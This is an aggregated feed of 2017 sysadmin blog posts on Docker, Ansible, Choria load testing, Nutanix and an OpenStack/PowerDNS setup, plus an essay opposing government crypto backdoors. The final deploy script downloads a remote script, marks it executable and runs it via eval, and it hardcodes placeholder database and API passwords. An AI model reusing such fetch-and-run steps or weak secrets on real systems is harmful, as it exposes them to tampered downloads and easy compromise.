This has saved me more times than I can count, having the ability to debug a running container the way you would in a "normal" VM.

First, see which containers are running;

$ docker ps
CONTAINER ID        IMAGE               COMMAND                  [...] NAMES
925cc10d55df        66cc85c3f275        "gitlab-runner-ser..."   [...] runner-f500bed1-project-3888560-concurrent-0-mysql-0-wait-for-service
0ab431ea0bcf        3e3878acd190        "docker-entrypoint..."   [...] runner-f500bed1-project-3888560-concurrent-0-mysql-0
4d9de6c0fba1        nginx:alpine        "nginx -g 'daemon ..."   [...] nginx-container

To get a shell (Bash) on a container of choice, run this;

$ docker exec -i -t nginx-container /bin/bash

The nginx-container determines which container you want to enter, it's the name in the last column of the docker ps output.

Alternatively, use the container ID;

$ docker exec -i -t 4d9de6c0fba1 /bin/bash

Don't use docker attach, as that'll give you funky results if the initial command that's started in a Docker container is something like MongoDB or Redis, the instance will be killed.

The post Get shell in running Docker container appeared first on ma.ttias.be.

by Mattias Geniar at October 15, 2017 09:40 AM

October 14, 2017

Electricmonk.nl

Ansible-cmdb v1.23: Generate a host overview of Ansible facts.

I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.

This release includes the following changes:

  • group_vars are now parsed.
  • Sub directories in host_vars are now parsed.
  • Addition of a -q/--quiet switch to suppress warnings.
  • Minor bugfixes and additions.

As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.

by admin at October 14, 2017 09:33 AM

October 13, 2017

Errata Security

"Responsible encryption" fallacies

Deputy Attorney General Rod Rosenstein gave a speech recently calling for "Responsible Encryption" (aka. "Crypto Backdoors"). It's full of dangerous ideas that need to be debunked.

The importance of law enforcement

The first third of the speech talks about the importance of law enforcement, as if it's the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.

But the Mira case demonstrated the opposite, how law enforcement is not needed. They made no arrests in the case. A year later, they still haven't a clue who did it.

Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including a high-capacity DNS provider like Google and Amazon who can handle such large attacks easily.

In other words, we the people fixed the major Mirai problem, and law-enforcement didn't.

Moreover, instead being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn't have the FBI investigate the attacks from Russia likely because they didn't want the FBI reading all their files, finding wrongdoing by the DNC. It's not that they did anything actually wrong, but it's more like that famous quote from Richelieu "Give me six words written by the most honest of men and I'll find something to hang him by". Give all your internal emails over to the FBI and I'm certain they'll find something to hang you by, if they want.

Or consider the case of Andrew Auernheimer. He found AT&T's website made public user accounts of the first iPad, so he copied some down and posted them to a news site. AT&T had denied the problem, so making the problem public was the only way to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.

It's not that law enforcement is bad, it's that it's not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.

Where law enforcement can't go

Rosenstein repeats the frequent claim in the encryption debate:
Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detection
Of course our society has places "impervious to detection", protected by both legal and natural barriers.

An example of a legal barrier is how spouses can't be forced to testify against each other. This barrier is impervious.

A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn't Rosenstein prosecuting those guilty of CIA torture?

Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech discussing the "rule of law" and how it applies to everyone, "protecting people from abuse by the government". It obviously doesn't, there's one rule of government and a different rule for the people, and the rule for government means there's lots of places law enforcement can't go to gather evidence.

Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn't apply to the President, Congress, the NSA, the Army, or Rosenstein himself.

Then there are the natural barriers. The police can't read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerprints. They can't go backwards in time.

I mention this because encryption is a natural barrier. It's their job to overcome this barrier if they can, to crack crypto and so forth. It's not our job to do it for them.

It's like the camera that increasingly comes with TVs for video conferencing, or the microphone on Alexa-style devices that are always recording. This suddenly creates evidence that the police want our help in gathering, such as having the camera turned on all the time, recording to disk, in case the police later gets a warrant, to peer backward in time what happened in our living rooms. The "nothing is impervious" argument applies here as well. And it's equally bogus here. By not helping police by not recording our activities, we aren't somehow breaking some long standing tradit

And this is the scary part. It's not that we are breaking some ancient tradition that there's no place the police can't go (with a warrant). Instead, crypto backdoors breaking the tradition that never before have I been forced to help them eavesdrop on me, even before I'm a suspect, even before any crime has been committed. Sure, laws like CALEA force the phone companies to help the police against wrongdoers -- but here Rosenstein is insisting I help the police against myself.

Balance between privacy and public safety

Rosenstein repeats the frequent claim that encryption upsets the balance between privacy/safety:
Warrant-proof encryption defeats the constitutional balance by elevating privacy above public safety.
This is laughable, because technology has swung the balance alarmingly in favor of law enforcement. Far from "Going Dark" as his side claims, the problem we are confronted with is "Going Light", where the police state monitors our every action.

You are surrounded by recording devices. If you walk down the street in town, outdoor surveillance cameras feed police facial recognition systems. If you drive, automated license plate readers can track your route. If you make a phone call or use a credit card, the police get a record of the transaction. If you stay in a hotel, they demand your ID, for law enforcement purposes.

And that's their stuff, which is nothing compared to your stuff. You are never far from a recording device you own, such as your mobile phone, TV, Alexa/Siri/OkGoogle device, laptop. Modern cars from the last few years increasingly have always-on cell connections and data recorders that record your every action (and location).

Even if you hike out into the country, when you get back, the FBI can subpoena your GPS device to track down your hidden weapon's cache, or grab the photos from your camera.

And this is all offline. So much of what we do is now online. Of the photographs you own, fewer than 1% are printed out, the rest are on your computer or backed up to the cloud.

Your phone is also a GPS recorder of your exact position all the time, which if the government wins the Carpenter case, they police can grab without a warrant. Tagging all citizens with a recording device of their position is not "balance" but the premise for a novel more dystopic than 1984.

If suspected of a crime, which would you rather the police searched? Your person, houses, papers, and physical effects? Or your mobile phone, computer, email, and online/cloud accounts?

The balance of privacy and safety has swung so far in favor of law enforcement that rather than debating whether they should have crypto backdoors, we should be debating how to add more privacy protections.

"But it's not conclusive"

Rosenstein defends the "going light" ("Golden Age of Surveillance") by pointing out it's not always enough for conviction. Nothing gives a conviction better than a person's own words admitting to the crime that were captured by surveillance. This other data, while copious, often fails to convince a jury beyond a reasonable doubt.

This is nonsense. Police got along well enough before the digital age, before such widespread messaging. They solved terrorist and child abduction cases just fine in the 1980s. Sure, somebody's GPS location isn't by itself enough -- until you go there and find all the buried bodies, which leads to a conviction. "Going dark" imagines that somehow, the evidence they've been gathering for centuries is going away. It isn't. It's still here, and matches up with even more digital evidence.

Conversely, a person's own words are not as conclusive as you think. There's always missing context. We quickly get back to the Richelieu "six words" problem, where captured communications are twisted to convict people, with defense lawyers trying to untwist them.

Rosenstein's claim may be true, that a lot of criminals will go free because the other electronic data isn't convincing enough. But I'd need to see that claim backed up with hard studies, not thrown out for emotional impact.

Terrorists and child molesters

You can always tell the lack of seriousness of law enforcement when they bring up terrorists and child molesters.

To be fair, sometimes we do need to talk about terrorists. There are things unique to terrorism where me may need to give government explicit powers to address those unique concerns. For example, the NSA buys mobile phone 0day exploits in order to hack terrorist leaders in tribal areas. This is a good thing.

But when terrorists use encryption the same way everyone else does, then it's not a unique reason to sacrifice our freedoms to give the police extra powers. Either it's a good idea for all crimes or no crimes -- there's nothing particular about terrorism that makes it an exceptional crime. Dead people are dead. Any rational view of the problem relegates terrorism to be a minor problem. More citizens have died since September 8, 2001 from their own furniture than from terrorism. According to studies, the hot water from the tap is more of a threat to you than terrorists.

Yes, government should do what they can to protect us from terrorists, but no, it's not so bad of a threat that requires the imposition of a military/police state. When people use terrorism to justify their actions, it's because they trying to form a military/police state.

A similar argument works with child porn. Here's the thing: the pervs aren't exchanging child porn using the services Rosenstein wants to backdoor, like Apple's Facetime or Facebook's WhatsApp. Instead, they are exchanging child porn using custom services they build themselves.

Again, I'm (mostly) on the side of the FBI. I support their idea of buying 0day exploits in order to hack the web browsers of visitors to the secret "PlayPen" site. This is something that's narrow to this problem and doesn't endanger the innocent. On the other hand, their calls for crypto backdoors endangers the innocent while doing effectively nothing to address child porn.

Terrorists and child molesters are a clichéd, non-serious excuse to appeal to our emotions to give up our rights. We should not give in to such emotions.

Definition of "backdoor"

Rosenstein claims that we shouldn't call backdoors "backdoors":
No one calls any of those functions [like key recovery] a “back door.”  In fact, those capabilities are marketed and sought out by many users.
He's partly right in that we rarely refer to PGP's key escrow feature as a "backdoor".

But that's because the term "backdoor" refers less to how it's done and more to who is doing it. If I set up a recovery password with Apple, I'm the one doing it to myself, so we don't call it a backdoor. If it's the police, spies, hackers, or criminals, then we call it a "backdoor" -- even it's identical technology.

Wikipedia uses the key escrow feature of the 1990s Clipper Chip as a prime example of what everyone means by "backdoor". By "no one", Rosenstein is including Wikipedia, which is obviously incorrect.

Though in truth, it's not going to be the same technology. The needs of law enforcement are different than my personal key escrow/backup needs. In particular, there are unsolvable problems, such as a backdoor that works for the "legitimate" law enforcement in the United States but not for the "illegitimate" police states like Russia and China.

I feel for Rosenstein, because the term "backdoor" does have a pejorative connotation, which can be considered unfair. But that's like saying the word "murder" is a pejorative term for killing people, or "torture" is a pejorative term for torture. The bad connotation exists because we don't like government surveillance. I mean, honestly calling this feature "government surveillance feature" is likewise pejorative, and likewise exactly what it is that we are talking about.

Providers

Rosenstein focuses his arguments on "providers", like Snapchat or Apple. But this isn't the question.

The question is whether a "provider" like Telegram, a Russian company beyond US law, provides this feature. Or, by extension, whether individuals should be free to install whatever software they want, regardless of provider.

Telegram is a Russian company that provides end-to-end encryption. Anybody can download their software in order to communicate so that American law enforcement can't eavesdrop. They aren't going to put in a backdoor for the U.S. If we succeed in putting backdoors in Apple and WhatsApp, all this means is that criminals are going to install Telegram.

If the, for some reason, the US is able to convince all such providers (including Telegram) to install a backdoor, then it still doesn't solve the problem, as uses can just build their own end-to-end encryption app that has no provider. It's like email: some use the major providers like GMail, others setup their own email server.

Ultimately, this means that any law mandating "crypto backdoors" is going to target users not providers. Rosenstein tries to make a comparison with what plain-old telephone companies have to do under old laws like CALEA, but that's not what's happening here. Instead, for such rules to have any effect, they have to punish users for what they install, not providers.

This continues the argument I made above. Government backdoors is not something that forces Internet services to eavesdrop on us -- it forces us to help the government spy on ourselves.

Rosenstein tries to address this by pointing out that it's still a win if major providers like Apple and Facetime are forced to add backdoors, because they are the most popular, and some terrorists/criminals won't move to alternate platforms. This is false. People with good intentions, who are unfairly targeted by a police state, the ones where police abuse is rampant, are the ones who use the backdoored products. Those with bad intentions, who know they are guilty, will move to the safe products. Indeed, Telegram is already popular among terrorists because they believe American services are already all backdoored. 

Rosenstein is essentially demanding the innocent get backdoored while the guilty don't. This seems backwards. This is backwards.

Apple is morally weak

The reason I'm writing this post is because Rosenstein makes a few claims that cannot be ignored. One of them is how he describes Apple's response to government insistence on weakening encryption doing the opposite, strengthening encryption. He reasons this happens because:
Of course they [Apple] do. They are in the business of selling products and making money. 
We [the DoJ] use a different measure of success. We are in the business of preventing crime and saving lives. 
He swells in importance. His condescending tone ennobles himself while debasing others. But this isn't how things work. He's not some white knight above the peasantry, protecting us. He's a beat cop, a civil servant, who serves us.

A better phrasing would have been:
They are in the business of giving customers what they want.
We are in the business of giving voters what they want.
Both sides are doing the same, giving people what they want. Yes, voters want safety, but they also want privacy. Rosenstein imagines that he's free to ignore our demands for privacy as long has he's fulfilling his duty to protect us. He has explicitly rejected what people want, "we use a different measure of success". He imagines it's his job to tell us where the balance between privacy and safety lies. That's not his job, that's our job. We, the people (and our representatives), make that decision, and it's his job is to do what he's told. His measure of success is how well he fulfills our wishes, not how well he satisfies his imagined criteria.

That's why those of us on this side of the debate doubt the good intentions of those like Rosenstein. He criticizes Apple for wanting to protect our rights/freedoms, and declare they measure success differently.

They are willing to be vile

Rosenstein makes this argument:
Companies are willing to make accommodations when required by the government. Recent media reports suggest that a major American technology company developed a tool to suppress online posts in certain geographic areas in order to embrace a foreign government’s censorship policies. 
Let me translate this for you:
Companies are willing to acquiesce to vile requests made by police-states. Therefore, they should acquiesce to our vile police-state requests.
It's Rosenstein who is admitting here is that his requests are those of a police-state.

Constitutional Rights

Rosenstein says:
There is no constitutional right to sell warrant-proof encryption.
Maybe. It's something the courts will have to decide. There are many 1st, 2nd, 3rd, 4th, and 5th Amendment issues here.

The reason we have the Bill of Rights is because of the abuses of the British Government. For example, they quartered troops in our homes, as a way of punishing us, and as a way of forcing us to help in our own oppression. The troops weren't there to defend us against the French, but to defend us against ourselves, to shoot us if we got out of line.

And that's what crypto backdoors do. We are forced to be agents of our own oppression. The principles enumerated by Rosenstein apply to a wide range of even additional surveillance. With little change to his speech, it can equally argue why the constant TV video surveillance from 1984 should be made law.

Let's go back and look at Apple. It is not some base company exploiting consumers for profit. Apple doesn't have guns, they cannot make people buy their product. If Apple doesn't provide customers what they want, then customers vote with their feet, and go buy an Android phone. Apple isn't providing encryption/security in order to make a profit -- it's giving customers what they want in order to stay in business.

Conversely, if we citizens don't like what the government does, tough luck, they've got the guns to enforce their edicts. We can't easily vote with our feet and walk to another country. A "democracy" is far less democratic than capitalism. Apple is a minority, selling phones to 45% of the population, and that's fine, the minority get the phones they want. In a Democracy, where citizens vote on the issue, those 45% are screwed, as the 55% impose their will unwanted onto the remainder.

That's why we have the Bill of Rights, to protect the 49% against abuse by the 51%. Regardless whether the Supreme Court agrees the current Constitution, it is the sort right that might exist regardless of what the Constitution says. 

Obliged to speak the truth

Here is the another part of his speech that I feel cannot be ignored. We have to discuss this:
Those of us who swear to protect the rule of law have a different motivation.  We are obliged to speak the truth.
The truth is that “going dark” threatens to disable law enforcement and enable criminals and terrorists to operate with impunity.
This is not true. Sure, he's obliged to say the absolute truth, in court. He's also obliged to be truthful in general about facts in his personal life, such as not lying on his tax return (the sort of thing that can get lawyers disbarred).

But he's not obliged to tell his spouse his honest opinion whether that new outfit makes them look fat. Likewise, Rosenstein knows his opinion on public policy doesn't fall into this category. He can say with impunity that either global warming doesn't exist, or that it'll cause a biblical deluge within 5 years. Both are factually untrue, but it's not going to get him fired.

And this particular claim is also exaggerated bunk. While everyone agrees encryption makes law enforcement's job harder than with backdoors, nobody honestly believes it can "disable" law enforcement. While everyone agrees that encryption helps terrorists, nobody believes it can enable them to act with "impunity".

I feel bad here. It's a terrible thing to question your opponent's character this way. But Rosenstein made this unavoidable when he clearly, with no ambiguity, put his integrity as Deputy Attorney General on the line behind the statement that "going dark threatens to disable law enforcement and enable criminals and terrorists to operate with impunity". I feel it's a bald face lie, but you don't need to take my word for it. Read his own words yourself and judge his integrity.

Conclusion

Rosenstein's speech includes repeated references to ideas like "oath", "honor", and "duty". It reminds me of Col. Jessup's speech in the movie "A Few Good Men".

If you'll recall, it was rousing speech, "you want me on that wall" and "you use words like honor as a punchline". Of course, since he was violating his oath and sending two privates to death row in order to avoid being held accountable, it was Jessup himself who was crapping on the concepts of "honor", "oath", and "duty".

And so is Rosenstein. He imagines himself on that wall, doing albeit terrible things, justified by his duty to protect citizens. He imagines that it's he who is honorable, while the rest of us not, even has he utters bald faced lies to further his own power and authority.

We activists oppose crypto backdoors not because we lack honor, or because we are criminals, or because we support terrorists and child molesters. It's because we value privacy and government officials who get corrupted by power. It's not that we fear Trump becoming a dictator, it's that we fear bureaucrats at Rosenstein's level becoming drunk on authority -- which Rosenstein demonstrably has. His speech is a long train of corrupt ideas pursuing the same object of despotism -- a despotism we oppose.

In other words, we oppose crypto backdoors because it's not a tool of law enforcement, but a tool of despotism.

by Robert Graham (noreply@blogger.com) at October 13, 2017 01:20 AM

October 11, 2017

Steve Kemp's Blog

A busy week or two

It feels like the past week or two has been very busy, and so I'm looking forward to my "holiday" next month.

I'm not really having a holiday of course, my wife is slowly returning to work, so I'll be taking a month of paternity leave, taking sole care of Oiva for the month of November. He's still a little angel, and now that he's reached 10 months old he's starting to get much more mobile - he's on the verge of walking, but not quite there yet. Mostly that means he wants you to hold his hands so that he can stand up, swaying back and forth before the inevitable collapse.

Beyond spending most of my evenings taking care of him, from the moment I return from work to his bedtime (around 7:30PM), I've made the Debian Administration website both read-only and much simpler. In the past that site was powered by a lot of servers, I think around 11. Now it has only a small number of machines, which should slowly decrease.

I've ripped out the database host, the redis host, the events-server, the planet-machine, the email-box, etc. Now we have a much simpler setup:

  • Front-end machine
    • Directly serves the code site
    • Directly serves the SSL site which exists solely for Let's Encrypt
    • Runs HAProxy to route the rest of the requests to the cluster.
  • 4 x Apache servers
    • Each one has a (read-only) MySQL database on it for the content.
      • In case of future-compromise I removed all user passwords, and scrambled the email-addresses.
      • I don't think there's a huge risk, but better safe than sorry.
    • Each one runs the web-application.
      • Which now caches each generated page to /tmp/x/x/x/x/$hash if it doesn't exist.
      • If the request is cached it is served from that cache rather than dynamically.

Finally although I'm slowly making progress with "radio stuff" I've knocked up a simple hack which uses an ultrasonic sensor to determine whether I'm sat in front of my (home) PC. If I am everything is good. If I'm absent the music is stopped and the screen locked. Kinda neat.

(Simple ESP8266 device wired to the sensor. When the state changes a message is posted to Mosquitto, where a listener reacts to the change(s).)

Oh, not final. I've also transfered my mobile phone from DNA.fi to MoiMobile. Which should complete soon, right now my phone is in limbo, active on niether service. Oops.

October 11, 2017 09:00 PM

LZone - Sysadmin

How to search Confluence for macro usage

When you want to find all pages in Confluence that embed a certain macro you cannot simply use the search field as it seamily only searches the resulting content. A normal search query does not check the markup for the macro code.

To search for a certain macro do a request like this
https://<base url>/dosearchsite.action?cql=macro+%3D+"<macro name>"
So to search for the "sql-query" macro for example do
https://<base url>/dosearchsite.action?cql=macro+%3D+"sql-query"

October 11, 2017 02:25 PM

October 10, 2017

Sean's IT Blog

Nutanix Xtract for VMs #blogtober

One of the defining features of the Nutanix platform is simplicity.  Innovations like the Prism interface for infrastructure management and One-Click Upgrades for both the Nutanix software-defined storage platform and supported hypervisors have lowered the management burden of on-premises infrastructure.

Nutanix is now looking to bring that same level of simplicity to migrating virtual machines to a new hypervisor.  Nutanix has released a new tool today called Xtract for VM.  This tool, which is free to all Nutanix customers, brings the same one-click simplicity that Nutanix is known for to migrating workloads from ESXi to AHV.

So how does Xtract for VM differentiate from other migration tools?  First, it is an agentless migration tool.  Xtract will communicate with vCenter to get a list of VMs that are in the ESXi infrastructure, and it will build a migration plan and synchronize the VM data from ESXi to AHV.

During data synchronization and migration, Xtract will insert the AHV device drivers into the virtual machine.  It will also capture and preserve the network configuration, so the VM will not lose connectivity or require administrator intervention after the migration is complete.

By injecting the AHV drivers and preserving the network configuration during the data synchronization and cutover, Xtract is able to perform cross-hypervisor migrations with minimal downtime.  And since the original VM is not touched during the migration, rollback is as easy as shutting down the AHV VM and powering the ESXi VM back on, which significantly reduces the risk of cross-hypervisor migrations.

Analysis

The datacenter is clearly changing, and we now live in a multi-hypervisor world.  While many customers will still run VMware for their on-premises environments, there are many that are looking to reduce their spend on hypervisor products.  Xtract for VMs provides a tool to help reduce that cost while providing the simplicity that Nutanix is known for.

While Xtract is currently version 1.0, I can see this technology be a pivotal for helping customers move workloads between on-premises and cloud infrastructures.

To learn more about this new tool, you can check out the Xtract for VMs page on Nutanix’s webpage.


by seanpmassey at October 10, 2017 04:36 PM

October 09, 2017

Sarah Allen

getting started with docker

Learning about docker this weekend… it always is hard to find resources for people who understand the concepts of VMs and containers and need to dive into something just a little bit complicated. I had been through lots of intro tutorials, when docker first arrived on the scene, and was seeking to set up a hosted dev instance for existing open source project which already had a docker set up.

Here’s an outline of the key concepts:

  • docker-machine: commands to create and manage VMs, whether locally or on a remote server
  • docker: commands to talk to your active VM that is already set up with docker-machine
  • docker-compose: a way to create and manage multiple containers on a docker-machine

As happens, I see parallels between human spoken language and new technical terms, which makes sense since these are things made by and for humans. The folks who made Docker invented a kind of language for us to talk to their software.

I felt like I was learning to read in a new language, like pig-latin, where words have a prefix of docker, like some kind of honorific

They use docker- to speak to VMs locally or remotely, and docker (without a dash) is an intimate form of communication with your active VM

Writing notes here, so I remember when I pick this up again. If there are Docker experts reading this, I’d be interested to know if I got this right and if there are other patterns or naming conventions that might help fast-track my learning of this new dialect for deploying apps in this land of containers and virtual machines.

Also, if a kind and generous soul wants to help an open source project, I’ve written up my work-in-progress steps for setting up OpenOpps-platform dev instance and would appreciate any advice, and of course, would welcome a pull request.

by sarah at October 09, 2017 02:17 PM

R.I.Pienaar

The Choria Emulator

In my previous posts I discussed what goes into load testing a Choria network, what connections are made, subscriptions are made etc.

From this it’s obvious the things we should be able to emulate are:

  • Connections to NATS
  • Subscriptions – which implies number of agents and sub collectives
  • Message payload sizes

To make it realistically affordable to emulate many more machines that I have I made an emulator that can start numbers of Choria daemons on a single node.

I’ve been slowly rewriting MCollective daemon side in Go which means I already had all the networking and connectors available there, so a daemon was written:

usage: choria-emulator --instances=INSTANCES [<flags>]
 
Emulator for Choria Networks
 
Flags:
      --help                 Show context-sensitive help (also try --help-long and --help-man).
      --version              Show application version.
      --name=""              Instance name prefix
  -i, --instances=INSTANCES  Number of instances to start
  -a, --agents=1             Number of emulated agents to start
      --collectives=1        Number of emulated subcollectives to create
  -c, --config=CONFIG        Choria configuration file
      --tls                  Enable TLS on the NATS connections
      --verify               Enable TLS certificate verifications on the NATS connections
      --server=SERVER ...    NATS Server pool, specify multiple times (eg one:4222)
  -p, --http-port=8080       Port to listen for /debug/vars

You can see here it takes a number of instances, agents and collectives. The instances will all respond with ${name}-${instance} on any mco ping or RPC commands. It can be discovered using the normal mc discovery – though only supports agent and identity filters.

Every instance will be a Choria daemon with the exact same network connection and NATS subscriptions as real ones. Thus 50 000 emulated Choria will put the exact same load of work on your NATS brokers as would normal ones, performance wise even with high concurrency the emulator performs quite well – it’s many orders of magnitude faster than the ruby Choria client anyway so it’s real enough.

The agents they start are all copies of this one:

emulated0
=========
 
Choria Agent emulated by choria-emulator
 
      Author: R.I.Pienaar <rip@devco.net>
     Version: 0.0.1
     License: Apache-2.0
     Timeout: 120
   Home Page: http://choria.io
 
   Requires MCollective 2.9.0 or newer
 
ACTIONS:
========
   generate
 
   generate action:
   ----------------
       Generates random data of a given size
 
       INPUT:
           size:
              Description: Amount of text to generate
                   Prompt: Size
                     Type: integer
                 Optional: true
            Default Value: 20
 
 
       OUTPUT:
           message:
              Description: Generated Message
               Display As: Message

You can this has a basic data generator action – you give it a desired size and it makes you a message that size. It will run as many of these as you wish all called like emulated0 etc.

It has an mcollective agent that go with it, the idea is you create a pool of machines all with your normal mcollective on it and this agent. Using that agent then you build up a different new mcollective network comprising the emulators, federation and NATS.

Here’s some example of commands – you’ll see these later again when we talk about scenarios:

We download the dependencies onto all our nodes:

$ mco playbook run setup-prereqs.yaml --emulator_url=https://example.net/rip/choria-emulator-0.0.1 --gnatsd_url=https://example.net/rip/gnatsd --choria_url=https://example.net/rip/choria

We start NATS on our first node:

$ mco playbook run start-nats.yaml --monitor 8300 --port 4300 -I test1.example.net

We start the emulator with 1500 instances per node all pointing to our above NATS:

$ mco playbook run start-emulator.yaml --agents 10 --collectives 10 --instances 750 --monitor 8080 --servers 192.168.1.1:4300

You’ll then setup a client config for the built network and can interact with it using normal mco stuff and the test suite I’ll show later. Simularly there are playbooks to stop all the various parts etc. The playbooks just interact with the mcollective agent so you could use mco rpc directly too.

I found I can easily run 700 to 1000 instances on basic VMs – needs like 1.5GB RAM – so it’s fairly light. Using 400 nodes I managed to build a 300 000 node Choria network and could easily interact with it etc.

Finally I made a ec2 environment where you can stand up a Puppet Master, Choria, the emulator and everything you need and do load tests on your own dime. I was able to do many runs with 50 000 emulated nodes on EC2 and the whole lot cost me less than $20.

The code for this emulator is very much a work in progress as is the Go code for the Choria protocol and networking but the emulator is here if you want to take a peek.

by R.I. Pienaar at October 09, 2017 07:37 AM

Joe Topjian

Building OpenStack Environments Part 3

Introduction

Continuing on with the series of building disposable OpenStack environments for testing purposes, this part will cover how to install services which are not supported by PackStack.

While PackStack does an amazing job at easily and quickly creating OpenStack environments, it only has the ability to install a subset of services under the OpenStack umbrella. However, almost all OpenStack services are supported by RDO, the overarching package library for RedHat/CentOS.

For this part in the series, I will show how to install and configure Designate, the OpenStack DNS service, using the RDO packages.

Planning the Installation

PackStack spoils us by hiding all of the steps required to install an OpenStack service. Installing a service requires a good amount of planning, even if the service is only going to be used for testing rather than production.

To begin planning, first read over any documentation you can find about the service in question. For Designate, there is a good amount of documentation here.

The overview page shows that there are a lot of moving pieces to Designate. Whether or not you need to account for all of these is still in question since it's possible that the RDO packages provide some sort of base configuration.

The installation page gives some brief steps about how to install Designate. By reading the page, you can see that all of the services listed in the Overview do not require special configuration. This makes things more simple.

Keep in mind that if you were to deploy Designate for production use, you might have to tune all of these services to suit your environment. Determining how to tune these services is out of scope for this blog post. Usually it requires careful reading of the various Designate configuration files, looking for supplementary information on mailing lists, and often even reading the source code itself.

The installation page shows how to use BIND as the default DNS driver. However, I'm going to change things up here. Instead, I will show how to use PowerDNS. There are two reasons for this:

  1. I'm allergic to BIND.
  2. I had trouble piecing together everything required to run Designate with the new PowerDNS driver, so this will also serve as documentation to help others.

Adding the Installation Steps

Continuing with Part 1 and Part 2, you should have a directory called terraform-openstack-test on your workstation. The structure of the directory should look something like this:

$ pwd
/home/jtopjian/terraform-openstack-test
$ tree .
.
├── files
│   └── deploy.sh
├── key
│   ├── id_rsa
│   └── id_rsa.pub
├── main.tf
└── packer
    ├── files
    │   ├── deploy.sh
    │   ├── packstack-answers.txt
    │   └── rc.local
    └── openstack
        ├── build.json
        └── main.tf

deploy.sh is used to install and configure PackStack and then strip any unique information from the installation. Packer then makes an image out of this installation. Finally, rc.local does some post-boot configuration.

To install and configure Designate, you will want to add additional pieces to both deploy.sh and rc.local.

Installing PowerDNS

First, install and configure PowerDNS. To do this, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

+ mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
+ mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y epel-release yum-plugin-priorities
+ curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
+ yum install -y pdns pdns-backend-mysql
+
+ echo "daemon=no
+ allow-recursion=127.0.0.1
+ config-dir=/etc/powerdns
+ daemon=yes
+ disable-axfr=no
+ guardian=yes
+ local-address=0.0.0.0
+ local-ipv6=::
+ local-port=53
+ setgid=pdns
+ setuid=pdns
+ slave=yes
+ socket-dir=/var/run
+ version-string=powerdns
+ out-of-zone-additional-processing=no
+ webserver=yes
+ api=yes
+ api-key=someapikey
+ launch=gmysql
+ gmysql-host=127.0.0.1
+ gmysql-user=pdns
+ gmysql-dbname=pdns
+ gmysql-password=password" | tee /etc/pdns/pdns.conf
+
+ mysql pdns < /home/centos/files/pdns.sql
+ sudo systemctl restart pdns

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
